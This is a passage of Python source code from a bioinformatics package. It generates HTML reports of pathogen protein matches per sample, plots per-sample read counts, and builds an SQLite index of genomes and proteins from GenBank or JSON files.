margin-left: 2%;
margin-right: 2%;
}
hr {
display: block;
margin-top: 0.5em;
margin-bottom: 0.5em;
margin-left: auto;
margin-right: auto;
border-style: inset;
border-width: 1px;
}
p.pathogen {
margin-top: 10px;
margin-bottom: 3px;
}
p.sample {
margin-top: 10px;
margin-bottom: 3px;
}
.sample {
margin-top: 5px;
margin-bottom: 2px;
}
ul {
margin-bottom: 2px;
}
.indented {
margin-left: 2em;
}
.sample-name {
font-size: 115%;
font-weight: bold;
}
.pathogen-name {
font-size: 115%;
font-weight: bold;
}
.index-name {
font-weight: bold;
}
.index {
font-size: small;
}
.index-letter {
font-size: 115%;
font-weight: bold;
}
.host {
font-size: small;
}
.taxonomy {
font-size: small;
}
.protein-name {
}
.stats {
font-family: "Courier New", Courier, monospace;
white-space: pre;
}
.protein-list {
margin-top: 2px;
}''',
'</style>',
])
append = result.append
proteinFieldsDescription = self._help(readCountColors, result)
append('<h2>%s</h2>' % title)
append(self._title(pathogenType))
if preamble:
append(preamble)
if minProteinFraction > 0.0:
append('<p>')
percent = minProteinFraction * 100.0
if nPathogenNames < len(self.genomeAccessions):
if nPathogenNames == 1:
append('Pathogen protein fraction filtering has been '
'applied, so information on only 1 pathogen is '
'displayed. This is the only pathogen for which at '
'least one sample matches at least %.2f%% of the '
'pathogen proteins.' % percent)
else:
append('Pathogen protein fraction filtering has been '
'applied, so information on only %d pathogens is '
'displayed. These are the only pathogens for which '
'at least one sample matches at least %.2f%% of '
'the pathogen proteins.' % (nPathogenNames,
percent))
else:
append('Pathogen protein fraction filtering was applied, '
'but all pathogens have at least %.2f%% of their '
'proteins matched by at least one sample.' % percent)
append('</p>')
if pathogenPanelFilename and genomeAccessions:
self.pathogenPanel(pathogenPanelFilename)
append('<p>')
append('<a href="%s">Panel showing read count per pathogen, '
'per sample.</a>' % pathogenPanelFilename)
append('Red vertical bars indicate samples with an unusually '
'high read count.')
append('</p>')
result.extend(proteinFieldsDescription)
append('<p style="margin-top: 10px;">Global: ')
append('<button type="button" class="btn btn-default btn-sm" '
'id="expand-all-button">Expand all</button>')
append('<button type="button" class="btn btn-default btn-sm" '
'id="collapse-all-button">Collapse all</button>')
append('</p>')
append('''
<script>
$("#expand-all-button").click(function(){
$(".collapse").collapse("show");
});
$("#collapse-all-button").click(function(){
$(".collapse").collapse("hide");
});
</script>
''')
append('<h2>Indices</h2>')
self._sampleIndex(sampleNames, result)
self._pathogenIndex(genomeAccessions, result, singular, plural)
self._samplesToHTML(
result, pathogenType, omitVirusLinks, sampleNames, readCountColors,
singular, plural)
self._pathogensToHTML(
result, pathogenType, genomeAccessions, omitVirusLinks,
readCountColors, bootstrapTreeviewDir, plural)
append('</body>')
append('</html>')
return '\n'.join(result)
def _samplesToHTML(self, result, pathogenType, omitVirusLinks,
sampleNames, readCountColors, singular, plural):
"""
Write all samples (with pathogens (with proteins)).
"""
append = result.append
append('<h2>Samples</h2>')
for sampleName in sampleNames:
samplePathogenAccessions = sorted(
(accession for accession in self.genomeAccessions
if sampleName in self.genomeAccessions[accession]),
key=self._genomeName)
append('<div>')
append('<button type="button" class="btn btn-default btn-sm" '
'data-toggle="collapse" data-target="#sample-%s-collapse">'
'<span class="glyphicon glyphicon-plus"></span></button>' %
sampleName)
if len(samplePathogenAccessions):
append(
'<a id="sample-%s"></a>'
'<span class="sample"><span class="sample-name">%s</span> '
'matched proteins from %d %s, '
'<a href="%s">panel</a>.</span>' %
(sampleName, sampleName, len(samplePathogenAccessions),
(singular if len(samplePathogenAccessions) == 1
else plural),
self.sampleNames[sampleName]))
else:
append(
'<a id="sample-%s"></a>'
'<span class="sample">'
'<span class="sample-name">%s</span> '
'did not match anything.</span>' %
(sampleName, sampleName))
continue
append('</div>')
append('<div class="collapse" id="sample-%s-collapse">' %
sampleName)
for genomeAccession in samplePathogenAccessions:
genomeInfo = self._db.findGenome(genomeAccession)
readsFileName = self.pathogenSampleFiles.lookup(
genomeAccession, sampleName)
proteins = self.genomeAccessions[genomeAccession][sampleName][
'proteins']
uniqueReadCount = self.genomeAccessions[
genomeAccession][sampleName]['uniqueReadCount']
proteinCount = len(proteins)
pathogenProteinCount = genomeInfo['proteinCount']
proteinCountStr = '%d/%d protein%s' % (
proteinCount, pathogenProteinCount,
'' if pathogenProteinCount == 1 else 's')
pathogenLinksHTML = ' (%s' % NCBISequenceLink(genomeAccession)
if pathogenType == 'viral' and not omitVirusLinks:
quoted = quote(genomeInfo['organism'])
pathogenLinksHTML += (
', <a href="%s%s">ICTV</a>, '
'<a href="%s%s">ViralZone</a>)'
) % (self.ICTV, quoted, self.VIRALZONE, quoted)
else:
pathogenLinksHTML += ')'
append(
'<p class="sample indented">'
'<a href="#pathogen-%s">%s</a> %s %s, '
'<a href="%s">%d read%s</a>:</p>' %
(genomeAccession, genomeInfo['organism'],
pathogenLinksHTML, proteinCountStr, readsFileName,
uniqueReadCount, '' if uniqueReadCount == 1 else 's'))
append('<ul class="protein-list indented">')
for proteinAccession in sorted(proteins):
proteinMatch = proteins[proteinAccession]
append(
'<li>'
'<span class="stats">'
'%(coverage).2f %(medianScore)6.2f %(bestScore)6.2f '
% proteinMatch)
if readCountColors:
countClass = readCountColors.thresholdToCssName(
readCountColors.thresholdForCount(
proteinMatch['readCount']))
self._appendNoSpace('<span class="%s">%4s</span>' % (
countClass, proteinMatch['readAndHspCountStr']),
result)
else:
self._appendNoSpace('%(readAndHspCountStr)3s' %
proteinMatch, result)
self._appendNoSpace(
'</span> '
'<span class="protein-name">'
'%(proteinName)s'
'</span> '
'(%(proteinLength)d aa,'
% proteinMatch, result)
if proteinMatch['proteinURL']:
append('<a href="%s">%s</a>, ' % (
proteinMatch['proteinURL'],
proteinMatch['accession']))
append(
'<a href="%(bluePlotFilename)s">blue plot</a>, '
'<a href="%(readsFilename)s">reads</a>)'
% proteinMatch)
append('</li>')
append('</ul>')
append('</div>')
def _pathogensToHTML(self, result, pathogenType, genomeAccessions,
omitVirusLinks, readCountColors,
bootstrapTreeviewDir, plural):
"""
Write all pathogens (with samples (with proteins)).
"""
append = result.append
append('<h2>%s</h2>' % plural.title())
if bootstrapTreeviewDir:
# A <div> to hold the taxonomy tree.
append('<div id="tree"></div>')
taxonomyHierarchy = Hierarchy()
for genomeAccession in genomeAccessions:
samples = self.genomeAccessions[genomeAccession]
sampleCount = len(samples)
genomeInfo = self._db.findGenome(genomeAccession)
pathogenProteinCount = genomeInfo['proteinCount']
lineage = (None if genomeInfo['taxonomyId'] is None
else self._taxdb.lineage(genomeInfo['taxonomyId']))
if lineage:
taxonomyHierarchy.add(lineage, genomeAccession)
lineageHTML = ', '.join(lineageTaxonomyLinks(lineage))
else:
lineageHTML = ''
pathogenLinksHTML = ' %s, %s' % (
genomeInfo['databaseName'],
NCBISequenceLink(genomeAccession))
if pathogenType == 'viral' and not omitVirusLinks:
quoted = quote(genomeInfo['organism'])
pathogenLinksHTML += (
', <a href="%s%s">ICTV</a>, <a href="%s%s">ViralZone</a>.'
) % (self.ICTV, quoted, self.VIRALZONE, quoted)
else:
pathogenLinksHTML += '.'
proteinCountStr = (' %d protein%s' %
(pathogenProteinCount,
'' if pathogenProteinCount == 1 else 's'))
pathogenReadsFilename = join(
self._pathogenDataDir,
'pathogen-%s.%s' % (genomeAccession, self._format))
pathogenReadsFp = open(pathogenReadsFilename, 'w')
pathogenReadCount = 0
append('<div>') # Button and following summary.
append('<button type="button" class="btn btn-default btn-sm" '
'data-toggle="collapse" '
'data-target="#pathogen-%s-collapse">'
'<span class="glyphicon glyphicon-plus"></span></button>' %
genomeAccession.replace('.', '-'))
append(
'<a id="pathogen-%s"></a>'
'<span class="pathogen">'
'<span class="pathogen-name">%s</span> '
'<span class="host">(%s)</span>'
'<br/>%d nt, %s, '
'matched by %d sample%s, '
'<a href="%s">%s</a> in total. '
'%s'
'<br/><span class="taxonomy">Taxonomy: %s.</span>'
'</span>' %
(genomeAccession,
genomeInfo['organism'],
genomeInfo.get('host') or 'unknown host',
genomeInfo['length'],
proteinCountStr,
sampleCount, '' if sampleCount == 1 else 's',
pathogenReadsFilename, self.READCOUNT_MARKER,
pathogenLinksHTML,
lineageHTML))
# Remember where we are in the output result so we can fill in
# the total read count once we have processed all samples for
# this pathogen. Not nice, I know.
pathogenReadCountLineIndex = len(result) - 1
append('</div>') # End of button summary.
append('<div class="collapse" id="pathogen-%s-collapse">' %
genomeAccession.replace('.', '-'))
for sampleName in self.sampleSort(samples):
readsFileName = self.pathogenSampleFiles.lookup(
genomeAccession, sampleName)
# Copy the read data from the per-sample reads for this
# pathogen into the per-pathogen file of reads.
with open(readsFileName) as readsFp:
while True:
data = readsFp.read(4096)
if data:
pathogenReadsFp.write(data)
else:
break
proteins = samples[sampleName]['proteins']
proteinCount = len(proteins)
uniqueReadCount = samples[sampleName]['uniqueReadCount']
pathogenReadCount += uniqueReadCount
proteinCountHTML = '%d protein%s, ' % (
proteinCount, '' if proteinCount == 1 else 's')
append(
'<p class="sample indented">'
'Sample <a href="#sample-%s">%s</a> '
'(%s<a href="%s">%d '
'read%s</a>, <a href="%s">panel</a>).</p>' %
(sampleName, sampleName,
proteinCountHTML,
readsFileName,
uniqueReadCount, '' if uniqueReadCount == 1 else 's',
self.sampleNames[sampleName]))
append('<ul class="protein-list indented">')
for proteinName in sorted(proteins):
proteinMatch = proteins[proteinName]
append(
'<li>'
'<span class="stats">'
'%(coverage).2f %(medianScore)6.2f %(bestScore)6.2f '
% proteinMatch
)
if readCountColors:
countClass = readCountColors.thresholdToCssName(
readCountColors.thresholdForCount(
proteinMatch['readCount']))
self._appendNoSpace('<span class="%s">%4s</span>' % (
countClass, proteinMatch['readAndHspCountStr']),
result)
else:
self._appendNoSpace('%(readAndHspCountStr)3s' %
proteinMatch, result)
if self._saveReadLengths:
self._appendNoSpace(' (%s)' % ', '.join(
map(str, sorted(proteinMatch['readLengths']))),
result)
self._appendNoSpace(
'</span> '
'<span class="protein-name">'
'%(proteinName)s'
'</span> '
'(%(proteinLength)d aa,'
% proteinMatch, result)
if proteinMatch['proteinURL']:
append('<a href="%s">%s</a>, ' % (
proteinMatch['proteinURL'],
proteinMatch['accession']))
append(
'<a href="%(bluePlotFilename)s">blue plot</a>, '
'<a href="%(readsFilename)s">reads</a>)'
% proteinMatch)
append('</li>')
append('</ul>')
append('</div>')
pathogenReadsFp.close()
# Sanity check there's a read count marker text in our output
# where we expect it.
readCountLine = result[pathogenReadCountLineIndex]
if readCountLine.find(self.READCOUNT_MARKER) == -1:
raise ValueError(
'Could not find pathogen read count marker (%s) in result '
'index %d text (%s).' %
(self.READCOUNT_MARKER, pathogenReadCountLineIndex,
readCountLine))
# Put the read count into the pathogen summary line we wrote
# earlier, replacing the read count marker with the correct
# text.
result[pathogenReadCountLineIndex] = readCountLine.replace(
self.READCOUNT_MARKER,
'%d read%s' % (pathogenReadCount,
'' if pathogenReadCount == 1 else 's'))
if bootstrapTreeviewDir:
append('''
<script>
$(document).ready(function(){
var tree = %s;
$('#tree').treeview({
data: tree,
enableLinks: true,
levels: 0,
});
});
</script>
''' % taxonomyHierarchy.toJSON())
def _help(self, readCountColors, result):
append = result.append
append('''
<script>
$(document).ready(function(){
$("#help-button").click(function(){
var self=$(this);
if (self.val() === "Show"){
self.val("Hide");
}
else {
self.val("Show");
}
$("#help-details").toggle();
});
});
</script>
''')
if readCountColors:
levels = []
append('<style>')
for threshold, color in readCountColors.colors:
klass = readCountColors.thresholdToCssName(threshold)
append('.%s { color: %s; font-weight: bold; }' %
(klass, color))
levels.append('<span class="%s">%d</span>' %
(klass, threshold))
append('</style>')
readCountColorLegend = (
' Color levels: ' + ', '.join(reversed(levels)) + '.')
else:
readCountColorLegend = ''
proteinFieldsDescription = [
'Help: <button type="button" class="btn btn-default btn-sm" '
'id="help-button">Show</button><br>',
'<div id="help-details" style="display:none;">',
'In all bullet point protein lists below, there are the following '
'numeric fields:',
'<ol>',
'<li>Coverage fraction.</li>',
'<li>Median bit score.</li>',
'<li>Best bit score.</li>',
'<li>Read count (if read and HSP counts differ, ',
('both are given, separated by "%s").%s</li>' %
(self.READ_AND_HSP_COUNT_STR_SEP, readCountColorLegend)),
]
if self._saveReadLengths:
proteinFieldsDescription.append(
'<li>All read lengths (in parentheses).</li>')
proteinFieldsDescription.extend([
'</ol>',
'</div>',
])
return proteinFieldsDescription
def _appendNoSpace(self, s, result):
assert result, ('Cannot append %r to empty result list' % s)
result[-1] += s
def _sampleIndex(self, sampleNames, result):
"""
Write a linked table of contents by sample.
"""
append = result.append
if len(sampleNames) == 1:
title = 'Sample'
else:
title = 'Samples (%d)' % len(sampleNames)
append('<p><span class="index-name">%s:</span>' % title)
append('<span class="index">')
for count, sampleName in enumerate(sampleNames, start=1):
append('<span class="index-letter">%d</span> '
'<a href="#sample-%s">%s</a>' %
(count, sampleName, sampleName))
append('·')
# Get rid of final middle dot and add a period.
result.pop()
self._appendNoSpace('.', result)
append('</span></p>')
def _pathogenIndex(self, genomeAccessions, result, singular, plural):
"""
Create a linked table of contents by pathogen.
"""
append = result.append
if len(genomeAccessions) == 1:
title = singular.title()
else:
title = '%s (%d)' % (plural.title(), len(genomeAccessions))
append('<p><span class="index-name">%s:</span>' % title)
append('<span class="index">')
lastLetter = None
for genomeAccession in genomeAccessions:
genomeInfo = self._db.findGenome(genomeAccession)
organism = genomeInfo['organism']
letter = organism[0]
if letter != lastLetter:
append('<span class="index-letter">%s</span>' % letter)
lastLetter = letter
append('<a href="#pathogen-%s">%s</a>' % (genomeAccession,
genomeInfo['organism']))
append('·')
# Get rid of final middle dot and add a period.
result.pop()
self._appendNoSpace('.', result)
append('</span></p>')
def _pathogenSamplePlot(self, genomeAccession, sampleNames, ax):
"""
Make an image of a graph giving pathogen read count (Y axis) versus
sample id (X axis).
@param genomeAccession: A C{str} pathogen accession number.
@param sampleNames: A sorted C{list} of sample names.
@param ax: A matplotlib C{axes} instance.
"""
readCounts = []
for sampleName in sampleNames:
try:
readCount = self.genomeAccessions[genomeAccession][sampleName][
'uniqueReadCount']
except KeyError:
readCount = 0
readCounts.append(readCount)
highlight = 'r'
normal = 'gray'
sdMultiple = 2.5
minReadsForHighlighting = 10
highlighted = []
if len(readCounts) == 1:
if readCounts[0] > minReadsForHighlighting:
color = [highlight]
highlighted.append(sampleNames[0])
else:
color = [normal]
else:
mean = np.mean(readCounts)
sd = np.std(readCounts)
color = []
for readCount, sampleName in zip(readCounts, sampleNames):
if (readCount > (sdMultiple * sd) + mean and
readCount >= minReadsForHighlighting):
color.append(highlight)
highlighted.append(sampleName)
else:
color.append(normal)
nSamples = len(sampleNames)
x = np.arange(nSamples)
yMin = np.zeros(nSamples)
ax.set_xticks([])
ax.set_xlim((-0.5, nSamples - 0.5))
ax.vlines(x, yMin, readCounts, color=color)
genomeInfo = self._db.findGenome(genomeAccession)
if highlighted:
title = '%s\nIn red: %s' % (
genomeInfo['organism'], fill(', '.join(highlighted), 50))
else:
# Add a newline to keep the first line of each title at the
# same place as those titles that have an "In red:" second
# line.
title = genomeInfo['organism'] + '\n'
ax.set_title(title, fontsize=10)
ax.tick_params(axis='both', which='major', labelsize=8)
ax.tick_params(axis='both', which='minor', labelsize=6)
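# Worked example of the highlighting rule above (counts hypothetical): for ten
# samples with read counts [1]*9 + [40], mean = 4.9 and sd ~= 11.7, so the
# cutoff is 2.5 * 11.7 + 4.9 ~= 34.1; the sample with 40 reads exceeds both
# the cutoff and minReadsForHighlighting, so its bar is drawn in red.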
def pathogenPanel(self, filename):
"""
Make a panel of images, with each image being a graph giving pathogen
de-duplicated (by id) read count (Y axis) versus sample id (X axis).
@param filename: A C{str} file name to write the image to.
"""
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
self._computeUniqueReadCounts()
genomeAccessions = sorted(self.genomeAccessions)
sampleNames = sorted(self.sampleNames)
cols = 5
rows = int(len(genomeAccessions) / cols) + (
0 if len(genomeAccessions) % cols == 0 else 1)
figure, ax = plt.subplots(rows, cols, squeeze=False)
coords = dimensionalIterator((rows, cols))
for genomeAccession in genomeAccessions:
row, col = next(coords)
self._pathogenSamplePlot(genomeAccession, sampleNames,
ax[row][col])
# Hide the final panel graphs (if any) that have no content. We do
# this because the panel is a rectangular grid and some of the
# plots at the end of the last row may be unused.
for row, col in coords:
ax[row][col].axis('off')
figure.suptitle(
'Per-sample read count for %d pathogen%s and %d sample%s.\n\n' % (
len(genomeAccessions),
'' if len(genomeAccessions) == 1 else 's',
len(sampleNames),
'' if len(sampleNames) == 1 else 's'),
fontsize=18)
figure.set_size_inches(5.0 * cols, 2.0 * rows, forward=True)
plt.subplots_adjust(hspace=0.4)
figure.savefig(filename)
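# Panel shape example: with 12 pathogens and cols = 5, rows = int(12 / 5) + 1
# = 3, giving a 3 x 5 grid; the 3 unused axes in the last row are switched
# off by the loop above.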
class _Genome(object):
"""
Hold genome information, mirroring the attributes of a BioPython
GenBank record.
@param d: A C{dict} holding genome information (see below).
"""
def __init__(self, d):
self.id = d['id']
self.description = d['name']
self.seq = d['sequence']
self.annotations = {}
self.lineage = [LineageElement(*lineage)
for lineage in d.get('lineage', [])]
self.features = [_GenomeFeature(f) for f in d['features']]
class _GenomeLocation(object):
"""
Hold genome feature location information, mirroring the attributes of a
BioPython GenBank record.
@param start: An C{int} start location.
@param end: An C{int} stop location.
@param strand: The C{int} strand, either 1 for forward or 0 for reverse.
"""
def __init__(self, start, end, strand):
self.start = start
self.end = end
self.strand = strand
def __str__(self):
return '[%d:%d](%s)' % (self.start, self.end,
'+' if self.strand == 1 else '-')
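# For example, str(_GenomeLocation(10, 250, 1)) is '[10:250](+)', and a
# reverse-strand location prints with '(-)'.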
class _GenomeFeature(object):
"""
Hold genome feature information, mirroring the attributes of a BioPython
GenBank record.
@param d: A C{dict} holding genome feature information.
"""
def __init__(self, d):
self.type = d['type']
self.qualifiers = d['qualifiers']
self.strand = 1
location = d['qualifiers']['location']
self.location = _GenomeLocation(location['start'], location['stop'],
self.strand)
class SqliteIndexWriter(object):
"""
Create or update an Sqlite3 database holding information about proteins and
the genomes they come from.
@param dbFilename: A C{str} file name containing an sqlite3 database. If
the file does not exist it will be created. The special string
":memory:" can be used to create an in-memory database.
@param fastaFp: A file-pointer to which the protein FASTA is written.
"""
PROTEIN_ACCESSION_FIELD = 2
GENOME_ACCESSION_FIELD = 4
SEQUENCE_ID_PREFIX = 'civ'
SEQUENCE_ID_SEPARATOR = '|'
def __init__(self, dbFilename, fastaFp=sys.stdout):
self._connection = sqlite3.connect(dbFilename)
self._fastaFp = fastaFp
cur = self._connection.cursor()
cur.executescript('''
CREATE TABLE IF NOT EXISTS proteins (
accession VARCHAR UNIQUE PRIMARY KEY,
genomeAccession VARCHAR NOT NULL,
sequence VARCHAR NOT NULL,
length INTEGER NOT NULL,
offsets VARCHAR NOT NULL,
forward INTEGER NOT NULL,
circular INTEGER NOT NULL,
rangeCount INTEGER NOT NULL,
gene VARCHAR,
note VARCHAR,
product VARCHAR,
FOREIGN KEY (genomeAccession)
REFERENCES genomes (accession)
);
CREATE TABLE IF NOT EXISTS genomes (
accession VARCHAR UNIQUE PRIMARY KEY,
organism VARCHAR NOT NULL,
name VARCHAR NOT NULL,
sequence VARCHAR NOT NULL,
length INTEGER NOT NULL,
proteinCount INTEGER NOT NULL,
host VARCHAR,
note VARCHAR,
taxonomyId INTEGER,
databaseName VARCHAR
);
''')
self._connection.commit()
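# The tables are linked by proteins.genomeAccession -> genomes.accession, so a
# query such as the following (a sketch using only the columns defined above)
# lists each protein together with the organism of its genome:
#
#   SELECT p.accession, p.product, g.organism
#   FROM proteins p JOIN genomes g ON p.genomeAccession = g.accession;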
def addGenBankFile(self, filename, taxonomyDatabase, dnaOnly=False,
rnaOnly=False, minGenomeLength=None,
maxGenomeLength=None, excludeExclusiveHosts=None,
excludeFungusOnlyViruses=False,
excludePlantOnlyViruses=False, databaseName=None,
proteinSource='GENBANK', genomeSource='GENBANK',
duplicationPolicy='error', logfp=None):
"""
Add proteins from a GenBank file.
@param filename: A C{str} file name, with the file in GenBank format
(see https://www.ncbi.nlm.nih.gov/Sitemap/samplerecord.html).
@param taxonomyDatabase: A taxonomy database. Must be given if
C{dnaOnly} is C{True} or C{rnaOnly} is C{True} or
C{excludeExclusiveHosts} is not C{None}.
@param dnaOnly: If C{True}, only include DNA viruses.
@param rnaOnly: If C{True}, only include RNA viruses.
@param minGenomeLength: If not C{None}, genomes of a length shorter
than this should not be added.
@param maxGenomeLength: If not C{None}, genomes of a length greater
than this should not be added.
@param excludeExclusiveHosts: Either C{None} or a set of host types
that should cause a genome to be excluded if the genome only
has a single host and it is in C{excludeExclusiveHosts}.
@param excludeFungusOnlyViruses: If C{True}, do not include fungus-only
viruses.
@param excludePlantOnlyViruses: If C{True}, do not include plant-only
viruses.
@param databaseName: A C{str} indicating the database the records
in C{filename} came from (e.g., 'refseq' or 'RVDB').
@param proteinSource: A C{str} giving the source of the protein
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param genomeSource: A C{str} giving the source of the genome
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
@return: A tuple containing three C{int}s: the number of genome sequences
examined in the added file, the number of genomes added, and the total
number of proteins added.
"""
def lineageFetcher(genome):
return taxonomyDatabase.lineage(genome.id)
with open(filename) as fp:
with self._connection:
genomes = SeqIO.parse(fp, 'gb')
return self._addGenomes(
genomes, taxonomyDatabase, lineageFetcher,
dnaOnly=dnaOnly, rnaOnly=rnaOnly,
minGenomeLength=minGenomeLength,
maxGenomeLength=maxGenomeLength,
excludeExclusiveHosts=excludeExclusiveHosts,
excludeFungusOnlyViruses=excludeFungusOnlyViruses,
excludePlantOnlyViruses=excludePlantOnlyViruses,
databaseName=databaseName, proteinSource=proteinSource,
genomeSource=genomeSource,
duplicationPolicy=duplicationPolicy, logfp=logfp)
def addJSONFile(self, filename, taxonomyDatabase, dnaOnly=False,
rnaOnly=False, minGenomeLength=None, maxGenomeLength=None,
excludeExclusiveHosts=None,
excludeFungusOnlyViruses=False,
excludePlantOnlyViruses=False,
databaseName=None, proteinSource='GENBANK',
genomeSource='GENBANK', duplicationPolicy='error',
logfp=None):
"""
Add proteins from a JSON info file.
@param filename: A C{str} file name, in JSON format.
@param taxonomyDatabase: A taxonomy database. Must be given if
C{dnaOnly} is C{True} or C{rnaOnly} is C{True} or
C{excludeExclusiveHosts} is not C{None}.
@param dnaOnly: If C{True}, only include DNA viruses.
@param rnaOnly: If C{True}, only include RNA viruses.
@param minGenomeLength: If not C{None}, genomes of a length shorter
than this should not be added.
@param maxGenomeLength: If not C{None}, genomes of a length greater
than this should not be added.
@param excludeExclusiveHosts: Either C{None} or a set of host types
that should cause a genome to be excluded if the genome only
has a single host and it is in C{excludeExclusiveHosts}.
@param excludeFungusOnlyViruses: If C{True}, do not include fungus-only
viruses.
@param excludePlantOnlyViruses: If C{True}, do not include plant-only
viruses.
@param databaseName: A C{str} indicating the database the records
in C{filename} came from (e.g., 'refseq' or 'RVDB').
@param proteinSource: A C{str} giving the source of the protein
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param genomeSource: A C{str} giving the source of the genome
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
@return: A tuple containing three C{int}s: the number of genome sequences
examined in the added file, the number of genomes added, and the total
number of proteins added.
"""
def lineageFetcher(genome):
return genome.lineage
with open(filename) as fp:
genome = _Genome(load(fp))
with self._connection:
return self._addGenomes(
[genome], taxonomyDatabase, lineageFetcher,
dnaOnly=dnaOnly, rnaOnly=rnaOnly,
minGenomeLength=minGenomeLength,
maxGenomeLength=maxGenomeLength,
excludeExclusiveHosts=excludeExclusiveHosts,
excludeFungusOnlyViruses=excludeFungusOnlyViruses,
excludePlantOnlyViruses=excludePlantOnlyViruses,
databaseName=databaseName, proteinSource=proteinSource,
genomeSource=genomeSource,
duplicationPolicy=duplicationPolicy, logfp=logfp)
def _addGenomes(
self, genomes, taxonomyDatabase, lineageFetcher, dnaOnly=False,
rnaOnly=False, minGenomeLength=None, maxGenomeLength=None,
excludeExclusiveHosts=None, excludeFungusOnlyViruses=False,
excludePlantOnlyViruses=False, databaseName=None,
proteinSource='GENBANK', genomeSource='GENBANK',
duplicationPolicy='error', logfp=None):
"""
Add a bunch of genomes.
@param genomes: An iterable of genomes. These are either genomes
returned by BioPython's GenBank parser or instances of C{_Genome}.
@param taxonomyDatabase: A taxonomy database.
@param lineageFetcher: A function that takes a genome and returns a
C{tuple} of the taxonomic categories of the genome. Each
tuple element is a 3-tuple of (C{int}, C{str}, C{str}) giving a
taxonomy id a (scientific) name, and the rank (species, genus,
etc). I.e., as returned by L{dark.taxonomy.LineageFetcher.lineage}.
@param dnaOnly: If C{True}, only include DNA viruses.
@param rnaOnly: If C{True}, only include RNA viruses.
@param minGenomeLength: If not C{None}, genomes of a length shorter
than this should not be added.
@param maxGenomeLength: If not C{None}, genomes of a length greater
than this should not be added.
@param excludeExclusiveHosts: Either C{None} or a set of host types
that should cause a genome to be excluded if the genome only
has a single host and it is in C{excludeExclusiveHosts}.
@param excludeFungusOnlyViruses: If C{True}, do not include fungus-only
viruses.
@param excludePlantOnlyViruses: If C{True}, do not include plant-only
viruses.
@param databaseName: A C{str} indicating the database the records
in C{filename} came from (e.g., 'refseq' or 'RVDB').
@param proteinSource: A C{str} giving the source of the protein
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param genomeSource: A C{str} giving the source of the genome
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
@return: A C{tuple} containing three C{int}s: the number of genome
sequences examined (for potential addition), the number of genomes
actually added, and the total number of proteins added.
"""
assert self.SEQUENCE_ID_SEPARATOR not in proteinSource, (
'proteinSource cannot contain %r as that is used as a separator.' %
self.SEQUENCE_ID_SEPARATOR)
assert self.SEQUENCE_ID_SEPARATOR not in genomeSource, (
'genomeSource cannot contain %r as that is used as a separator.' %
self.SEQUENCE_ID_SEPARATOR)
assert not (dnaOnly and rnaOnly), (
'dnaOnly and rnaOnly cannot both be True.')
examinedGenomeCount = addedGenomeCount = addedProteinCount = 0
for genome in genomes:
examinedGenomeCount += 1
source = self._sourceInfo(genome, logfp=logfp)
if source is None:
# The lack of a source is logged by self._sourceInfo.
continue
genomeLength = len(str(genome.seq))
if logfp:
print('\n%s: %s' % (genome.id, genome.description), file=logfp)
print(' length = %d' % genomeLength, file=logfp)
print(' Source:', file=logfp)
for k, v in source.items():
print(' %s = %r' % (k, v), file=logfp)
print(' Annotations:', file=logfp)
for k, v in genome.annotations.items():
if k not in ('references', 'comment',
'structured_comment'):
print(' %s = %r' % (k, v), file=logfp)
if minGenomeLength is not None and genomeLength < minGenomeLength:
if logfp:
print(' Genome too short. Skipping.', file=logfp)
continue
if maxGenomeLength is not None and genomeLength > maxGenomeLength:
if logfp:
print(' Genome too long. Skipping.', file=logfp)
continue
try:
lineage = lineageFetcher(genome)
except ValueError as e:
print('ValueError calling lineage fetcher for %s (%s): %s' %
(genome.id, genome.description, e), file=logfp)
lineage = taxonomyId = None
else:
taxonomyId = lineage[0][0]
if dnaOnly:
if not source['mol_type'].endswith('DNA'):
if logfp:
print(' %s (%s) is not a DNA virus (mol_type).' %
(genome.id, genome.description), file=logfp)
continue
# if lineage:
# print(' Lineage:', file=logfp)
# print(formatLineage(lineage, prefix=' '), file=logfp)
# if isDNAVirus(lineage):
# if logfp:
# print(' %s (%s) is a DNA virus.' %
# (genome.id, genome.description),
# file=logfp)
# else:
# if logfp:
# print(' %s (%s) is not a DNA virus.' %
# (genome.id, genome.description),
# file=logfp)
# continue
# else:
# print('Could not look up taxonomy lineage for %s (%s). '
# 'Cannot confirm as DNA.' %
# (genome.id, genome.description), file=logfp)
# continue
if rnaOnly:
if not source['mol_type'].endswith('RNA'):
if logfp:
print(' %s (%s) is not a RNA virus (mol_type).' %
(genome.id, genome.description), file=logfp)
continue
# if lineage:
# print(' Lineage:', file=logfp)
# print(formatLineage(lineage, prefix=' '), file=logfp)
# if isRNAVirus(lineage):
# if logfp:
# print(' %s (%s) is an RNA virus.' %
# (genome.id, genome.description),
# file=logfp)
# else:
# if logfp:
# print(' %s (%s) is not an RNA virus. Skipping.'
# % (genome.id, genome.description),
# file=logfp)
# continue
# else:
# print('Could not look up taxonomy lineage for %s (%s). '
# 'Cannot confirm as RNA. Skipping.' %
# (genome.id, genome.description), file=logfp)
# continue
if excludeFungusOnlyViruses:
if lineage is None:
print('Could not look up taxonomy lineage for %s '
'(%s). Cannot confirm as fungus-only virus. '
'Skipping.' %
(genome.id, genome.description), file=logfp)
else:
if taxonomyDatabase.isFungusOnlyVirus(
lineage, genome.description):
if logfp:
